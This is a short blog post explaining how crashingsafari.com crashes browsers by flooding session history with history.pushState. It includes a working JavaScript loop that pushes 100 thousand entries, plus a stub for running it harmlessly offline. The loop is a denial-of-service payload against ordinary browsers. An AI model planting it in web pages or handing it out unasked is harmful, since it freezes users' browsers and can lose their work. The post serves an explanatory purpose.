Last week I wrote about crashing browsers with favicons that are infinitely large. This week I found out about a website called crashingsafari.com while browsing Facebook. It made the news by crashing Safari in a different and hilarious way. The code is simple, and in practice it works on all browsers.
That's it! If you look up what the history.pushState method does, you'll see it takes three arguments. The first is a state object (anything structured-cloneable). Next is a title, which Firefox currently ignores. Last is a URL, which has to stay on the same origin as the page. In this case the payload just uses a unique string each time.
So what actually happens? Every pushState call adds a new entry for the crashingsafari.com page to your session history, and the loop does that 100 thousand times. That's a big problem, since this history apparently has no upper limit on its size. The page quickly becomes unresponsive, impossible to close, and keeps allocating more memory. It's also pretty neat, since you can watch the URL bar fill up with numbers each time pushState is called.
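Here is the pushState flood described above, written out as an added example. It is not the crashingsafari.com page's own code; the entry count, the counter-as-URL pattern and the stub `history` object are my assumptions for illustration. The same loop runs in a browser against the real `history` (where it will make the tab unresponsive, exactly as described) and in Node against the stub, where the entries can be counted and inspected without hanging anything.

```javascript
// Added example of the history.pushState flood (not the crashingsafari.com
// page's own code). Assumptions: 100 thousand entries, the loop counter used
// as the unique URL, and a stub history object for running outside a browser.

const DEFAULT_ENTRIES = 100000;

// A History-like object exposing the two members the payload touches.
// Node has no `history`, so this stub records each pushState call instead
// of extending any real session history.
function makeStubHistory() {
  const entries = [];
  return {
    entries,
    get length() { return entries.length; },
    pushState(state, title, url) { entries.push({ state, title, url }); },
  };
}

// The payload: one pushState per iteration, each with a URL that is unique
// because it is built from the loop counter, so the address bar fills with
// numbers. Returns the number of entries that were added.
function floodHistory(hist, count = DEFAULT_ENTRIES) {
  for (let i = 0; i < count; i++) {
    // A relative URL stays on the current origin; pushState throws a
    // SecurityError for a cross-origin URL. The title argument is ignored
    // by browsers, and the state object must be structured-cloneable.
    hist.pushState({ i }, '', String(i));
  }
  return count;
}

// Inspection helper for the stub: how many distinct URLs were pushed.
function uniqueUrlCount(hist) {
  return new Set(hist.entries.map((e) => e.url)).size;
}

// Stand-alone run against the stub so this file is harmless under Node.
// In a browser, call floodHistory(history) from the console instead, on a
// tab you do not mind losing.
const demo = makeStubHistory();
floodHistory(demo, 1000);
console.log(`pushed ${demo.length} entries, ${uniqueUrlCount(demo)} unique URLs`);
```

The stub exists only so the payload can be exercised offline; nothing in it models the browser's per-entry memory cost, which is the part that actually brings the tab down.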
I wonder what else in browsers doesn't have an upper limit. There are probably a lot more bugs like these out there.
ejj, Jan 2016